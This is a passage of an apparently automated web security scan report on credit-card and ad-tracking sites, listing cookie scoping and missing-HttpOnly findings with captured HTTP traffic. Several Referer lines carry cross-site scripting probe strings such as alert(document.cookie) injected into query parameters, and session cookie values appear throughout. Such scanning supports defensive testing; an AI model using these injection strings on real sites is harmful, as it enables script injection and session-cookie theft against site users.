The following cookie was issued by the application and is scoped to a parent of the issuing domain:

v1st=7EAFCCE87BE48675; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/onlineopinionF3cS/oo_engine.js HTTP/1.1
Host: www.capitalone.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a%27%3balert(document.location)//fd5f10cff0
Cookie: Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=a44aa3f2cy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCq8fF38gWKZQanFhdn5uc555cCFRrWOEO1ulYUpBZlpuYlp8J1A3V45qEpBwA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a'; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:06:36 GMT
Server: Apache
Set-Cookie: v1st=7EAFCCE87BE48675; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Wed, 16 Mar 2011 13:21:40 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 7305
Content-Type: application/x-javascript
Set-Cookie: BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

/* OnlineOpinion (F3cS,8448b) */
/* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. 6606581, 6421724, 6785717 B1 and other patents pending. */
var custom_var,O_t
...[SNIP]...

9.38. http://www.capitalone.com/js/questus/config.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/js/questus/config.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

v1st=B2643B616AC9A640; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/questus/config.js HTTP/1.1
Host: www.capitalone.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a%27%3balert(document.location)//fd5f10cff0
Cookie: Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=a44aa3f2cy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCq8fF38gWKZQanFhdn5uc555cCFRrWOEO1ulYUpBZlpuYlp8J1A3V45qEpBwA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a'; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:06:36 GMT
Server: Apache
Set-Cookie: v1st=B2643B616AC9A640; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Wed, 08 Sep 2010 16:09:04 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 3100
Content-Type: application/x-javascript
Set-Cookie: BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

var questusSurveyConfig = {
includeUrls : {
'.*\.capitalone\.com(:80[0-9]0)?.*' : {
delay: 30000,
ratio: 1/223,
list: 10
},
'.*\.
...[SNIP]...

9.39. http://www.capitalone.com/js/questus/intercept.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/js/questus/intercept.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

v1st=B833A23EE35CDFDA; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/questus/intercept.js HTTP/1.1
Host: www.capitalone.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a%27%3balert(document.location)//fd5f10cff0
Cookie: Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=a44aa3f2cy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCq8fF38gWKZQanFhdn5uc555cCFRrWOEO1ulYUpBZlpuYlp8J1A3V45qEpBwA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a'; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:06:36 GMT
Server: Apache
Set-Cookie: v1st=B833A23EE35CDFDA; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Thu, 08 Jul 2010 15:13:22 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 11914
Content-Type: application/x-javascript
Set-Cookie: BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

function Stub() { //{{{
this.survey = "/survey/qst/qst10001";
this.rawUrl = "http://survey.questus.com/survey/qst/qst10001";
this.urlSettings = questusSurveyConfig.stealthPages;
th
...[SNIP]...

9.40. http://www.capitalone.com/media/graphic_logo/global/button/action-oversized-apply-now.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/media/graphic_logo/global/button/action-oversized-apply-now.png

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

v1st=CA5579C54B3656E9; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /media/graphic_logo/global/button/action-oversized-apply-now.png HTTP/1.1
Host: www.capitalone.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a%27%3balert(document.location)//fd5f10cff0
Cookie: Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=a44aa3f2cy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCq8fF38gWKZQanFhdn5uc555cCFRrWOEO1ulYUpBZlpuYlp8J1A3V45qEpBwA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a'; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:06:36 GMT
Server: Apache
Set-Cookie: v1st=CA5579C54B3656E9; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
Cache-Control: max-age=3600
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 20:55:28 GMT
Accept-Ranges: bytes
Content-Length: 1110
Vary: User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Type: image/png
Set-Cookie: BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

.PNG
.
...IHDR..._.................PLTEY..t.!l........b..i..t.Y........m..om./.........A^!{.-..L.................Y..T..>..Zf..q. ...|.@t..........0..Z.........^....i..}..x."../o....<.....D..Cd..f..
...[SNIP]...

9.41. http://www.capitalone.com/media/graphic_logo/small_business/card_art/card_art_sb_venture_v.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/media/graphic_logo/small_business/card_art/card_art_sb_venture_v.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

v1st=CA8592065BB2D7FA; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /media/graphic_logo/small_business/card_art/card_art_sb_venture_v.jpg HTTP/1.1
Host: www.capitalone.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a%27%3balert(document.location)//fd5f10cff0
Cookie: Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=a44aa3f2cy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCq8fF38gWKZQanFhdn5uc555cCFRrWOEO1ulYUpBZlpuYlp8J1A3V45qEpBwA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a'; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:06:36 GMT
Server: Apache
Set-Cookie: v1st=CA8592065BB2D7FA; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
Cache-Control: max-age=3600
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 20:55:30 GMT
Accept-Ranges: bytes
Content-Length: 5261
Vary: User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Type: image/jpeg
Set-Cookie: BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

......JFIF.....d.d.....HMEDIABIN_DIDB #MB%:{CF8F524C-6750-484A-AA5F-D771FB9334F4}MEDIABIN:%MB#....Ducky.......2.....,Photoshop 3.0.8BIM.........H.......H..........http://ns.adobe.com/xap/1.0/.<?xpacke
...[SNIP]...

9.42. http://www.wtp101.com/bk previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wtp101.com
Path:	/bk

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

tuuid=73b6b0a9-a657-4959-8c44-a72cc1d5226b; path=/; expires=Sun, 16 Jun 2013 12:12:23 GMT; domain=.wtp101.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bk?bk_uuid=FX6%2BES9c99Otz5OB&nocb=1&redir=http%3A%2F%2Ftags.bluekai.com%2Fsite%2F2750%3Fid=PARTNER_UUID HTTP/1.1
Host: www.wtp101.com
Proxy-Connection: keep-alive
Referer: http://tags.bluekai.com/site/2939?ret=html&phint=keywords%3Dcredit%20cards%2C%20credit%20card%2C%20credit%2C%20creditcards%2C%20visa%2C%20offers%2C%20search%2C%20compare%2C%20apply%2C%20mastercard%2C%20low%20interest%2C%20student%2C%20instant%20approval%2C%20balance%20transfer%2C%20reward%2C%20business%2C%20student%2C%20cash%20back&phint=__bk_t%3DCredit%20Cards%20-%20Compare%20Credit%20Card%20Offers%20at%20CreditCards.com&phint=__bk_k%3Dcredit%20cards%2C%20credit%20card%2C%20credit%2C%20creditcards%2C%20visa%2C%20offers%2C%20search%2C%20compare%2C%20apply%2C%20mastercard%2C%20low%20interest%2C%20student%2C%20instant%20approval%2C%20balance%20transfer%2C%20reward%2C%20business%2C%20student%2C%20cash%20back&limit=4&r=99971968
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tuuid=73b6b0a9-a657-4959-8c44-a72cc1d5226b

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Fri, 17 Jun 2011 12:12:23 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Location: http://tags.bluekai.com/site/2750?id=73b6b0a9-a657-4959-8c44-a72cc1d5226b
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Pragma: no-cache
Set-Cookie: tuuid=73b6b0a9-a657-4959-8c44-a72cc1d5226b; path=/; expires=Sun, 16 Jun 2013 12:12:23 GMT; domain=.wtp101.com
Content-Length: 0
Connection: keep-alive

9.43. https://www262.americanexpress.com/business-card-application/simplycash-business-credit-card/apply/42732-9-0 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www262.americanexpress.com
Path:	/business-card-application/simplycash-business-credit-card/apply/42732-9-0

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

s_vi=[CS]v1|26FDA14A051D10C8-4000012AC0103AC7[CE]; Expires=Wed, 15 Jun 2016 12:06:48 GMT; Path=/; Domain=.americanexpress.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.44. https://www262.americanexpress.com/business-card-application/the-plum-card-business-charge-card/apply/42732-9-0/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www262.americanexpress.com
Path:	/business-card-application/the-plum-card-business-charge-card/apply/42732-9-0/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

s_vi=[CS]v1|26FDA14A051D10C8-4000012AC0103AC7[CE]; Expires=Wed, 15 Jun 2016 12:03:57 GMT; Path=/; Domain=.americanexpress.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10. Cookie without HttpOnly flag set previous next
There are 73 instances of this issue:

https://application.capitalone.com/icoreapp/jsp/landing.jsp
http://dg.specificclick.net/
http://sales.liveperson.net/visitor/addons/deploy.asp
http://sales.liveperson.net/visitor/addons/deploy.asp
http://sales.liveperson.net/visitor/addons/deploy.asp
https://www.applyonlinenow.com/USCCapp/Ctl/display
https://www.applyonlinenow.com/USCCapp/Ctl/entry
https://www.applyonlinenow.com/USCCapp/Ctl/validate
http://www.capitalone.com/smallbusiness/cards/venture-for-business/
https://www.citicards.com/cards/acq/Apply.do
https://www.citicards.com/cards/acq/Apply.do
https://www.citicards.com/cards/acq/displayECM.do
https://www.citicards.com/cards/acq/genericcontent.do
http://ad.yieldmanager.com/pixel
http://as00.estara.com/fs/ruleaction.php
http://b.scorecardresearch.com/b
http://cf.addthis.com/red/p.json
http://citi.bridgetrack.com/usc/_bt_appredir.asp
http://citi.bridgetrack.com/usc/_spredir.htm
http://citi.bridgetrack.com/usc/_spredir.htm
http://click.linksynergy.com/fs-bin/click
http://click.linksynergy.com/fs-bin/click
http://creditcards.citicards.com/usc/_bt_appredir.asp
http://creditcards.citicards.com/usc/platinum/MC/external/affiliate/Mar2011/default.htm
http://creditcards.citicards.com/usc/platinum/Visa/external/affiliate/Mar2011/default.htm
http://creditcards.citicards.com/usc/value/diamond_preferred/MAr2011pricing/external/default.htm
http://pixel.33across.com/ps/
http://s46.sitemeter.com/js/counter.asp
http://sales.liveperson.net/hc/32528459/
http://sales.liveperson.net/hc/32528459/
http://spotlight.creditcards.com/www/delivery/ajs.php
http://spotlight.creditcards.com/www/delivery/lg.php
http://tags.bluekai.com/site/2750
http://tags.bluekai.com/site/2939
http://www.bankofamerica.com/global/mvc_objects/stylesheet/hs2_mvc_content_style_default2.css
http://www.capitalone.com/css/global/portal_base.css
http://www.capitalone.com/css/global/portal_common.css
http://www.capitalone.com/css/global/portal_grid.css
http://www.capitalone.com/css/global/portal_print.css
http://www.capitalone.com/css/page-type/portal_landing-accordion.css
http://www.capitalone.com/css/page-type/portal_popup.css
http://www.capitalone.com/css/page-type/portal_product.css
http://www.capitalone.com/css/portal_footer.css
http://www.capitalone.com/css/portal_header.css
http://www.capitalone.com/css/portal_page-nav-heading.css
http://www.capitalone.com/img/global/icon/lock.gif
http://www.capitalone.com/img/global/logo/ehl.png
http://www.capitalone.com/img/global/logo/fdic.png
http://www.capitalone.com/img/global/logo/sprite/header.gif
http://www.capitalone.com/js/component/portal_accordion.js
http://www.capitalone.com/js/component/portal_open_account.js
http://www.capitalone.com/js/component/portal_swfobject.js
http://www.capitalone.com/js/component/portal_utilitynav.js
http://www.capitalone.com/js/global/cof/portal_header.js
http://www.capitalone.com/js/global/cof/portal_headerFooter.js
http://www.capitalone.com/js/global/portal_cof.js
http://www.capitalone.com/js/global/portal_footnote.js
http://www.capitalone.com/js/global/portal_global.js
http://www.capitalone.com/js/liveperson/LivePerson_USC_VS.js
http://www.capitalone.com/js/liveperson/mtagconfig.js
http://www.capitalone.com/js/onlineopinionF3cS/oo_conf_en-US.js
http://www.capitalone.com/js/onlineopinionF3cS/oo_engine.js
http://www.capitalone.com/js/questus/config.js
http://www.capitalone.com/js/questus/intercept.js
http://www.capitalone.com/media/graphic_logo/global/button/action-oversized-apply-now.png
http://www.capitalone.com/media/graphic_logo/small_business/card_art/card_art_sb_venture_v.jpg
https://www.citicards.com/cards/acq/TimeOut.do
http://www.creditcards.com/oc/
http://www.creditcards.com/sb.php
https://www.discovercard.com/cardmembersvcs/registration/reg/goto
http://www.wtp101.com/bk
https://www262.americanexpress.com/business-card-application/simplycash-business-credit-card/apply/42732-9-0
https://www262.americanexpress.com/business-card-application/the-plum-card-business-charge-card/apply/42732-9-0/

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

10.1. https://application.capitalone.com/icoreapp/jsp/landing.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://application.capitalone.com
Path:	/icoreapp/jsp/landing.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=7R2PN7BWkq05FB2nsTl1DjYPsgvXT2vPp222kzwTp1ZqXy1729fJ!-968881363; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.2. http://dg.specificclick.net/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://dg.specificclick.net
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=d831adc767cdca842f5d94e33487; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?y=3&t=h&u=http%3A%2F%2Fblogs.creditcards.com%2Ffine-print%2F%3F3cf6d%2522-alert(document.cookie)-%2522cf7270b0551%3D1&r=http%3A%2F%2Fburp%2Fshow%2F6 HTTP/1.1
Host: dg.specificclick.net
Proxy-Connection: keep-alive
Referer: http://blogs.creditcards.com/fine-print/?3cf6d%22-alert(document.cookie)-%22cf7270b0551=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adp=7qHV^0^3; smdmp=7qEy:811200901^7qEy:1; adf=7qHV^0^0; ug=FiMiv7kDK4v9CD; JSESSIONID=d7871db8b8acefd6fc93aed0ae52

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: JSESSIONID=d831adc767cdca842f5d94e33487; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Fri, 17 Jun 2011 12:11:12 GMT
Vary: Accept-Encoding
Content-Length: 569
Connection: Keep-Alive

<html><body> <script> var _comscore = _comscore || []; _comscore.push({ c1: "8", c2: "2101" ,c3: "1234567891234567891" }); (function() { var s = document.createElement("script"), el = docume
...[SNIP]...

10.3. http://sales.liveperson.net/visitor/addons/deploy.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://sales.liveperson.net
Path:	/visitor/addons/deploy.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDQASASRDT=CADAEEFBMKGKAJFKMDJNHNDO; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /visitor/addons/deploy.asp?site=32528459&d_id=sb-sales-english HTTP/1.1
Host: sales.liveperson.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a%27%3balert(1)//fd5f10cff0
Cookie: LivePersonID=LP i=16601155425835,d=1302186497; HumanClickACTIVE=1308312408486; ASPSESSIONIDSARDTDCT=JHCIMLECCHIIGDFOEGCGBDHM; ASPSESSIONIDACDQDTTB=JIEHKIJCJAMFMOBIPBLNKKFE

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:07:34 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Last-Modified: Tue, 14 Jul 2009 13:04:47 GMT
Content-Length: 2124
Content-Type: application/x-javascript
Set-Cookie: ASPSESSIONIDQASASRDT=CADAEEFBMKGKAJFKMDJNHNDO; path=/
Cache-control: public, max-age=3600, s-maxage=3600

//Plugins for site 32528459
lpAddMonitorTag();
typeof lpMTagConfig!="undefined"&&function(a){lpMTagConfig.isMobile=!1;if(/android|avantgo|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(ho
...[SNIP]...

10.4. http://sales.liveperson.net/visitor/addons/deploy.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://sales.liveperson.net
Path:	/visitor/addons/deploy.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDSQACRQCA=KBFILLHBLECAOPMHGOINANGG; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /visitor/addons/deploy.asp?site=32528459&d_id=sb-sales-english HTTP/1.1
Host: sales.liveperson.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a%27%3balert(document.location)//fd5f10cff0
Cookie: LivePersonID=LP i=16601155425835,d=1302186497; HumanClickACTIVE=1308312408486; ASPSESSIONIDSARDTDCT=JHCIMLECCHIIGDFOEGCGBDHM

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:07:18 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Last-Modified: Tue, 14 Jul 2009 13:04:47 GMT
Content-Length: 2124
Content-Type: application/x-javascript
Set-Cookie: ASPSESSIONIDSQACRQCA=KBFILLHBLECAOPMHGOINANGG; path=/
Cache-control: public, max-age=3600, s-maxage=3600

//Plugins for site 32528459
lpAddMonitorTag();
typeof lpMTagConfig!="undefined"&&function(a){lpMTagConfig.isMobile=!1;if(/android|avantgo|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(ho
...[SNIP]...

10.5. http://sales.liveperson.net/visitor/addons/deploy.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://sales.liveperson.net
Path:	/visitor/addons/deploy.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDSARDTDCT=JHCIMLECCHIIGDFOEGCGBDHM; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /visitor/addons/deploy.asp?site=32528459&d_id=sb-sales-english HTTP/1.1
Host: sales.liveperson.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a%27%3balert(document.location)//fd5f10cff0
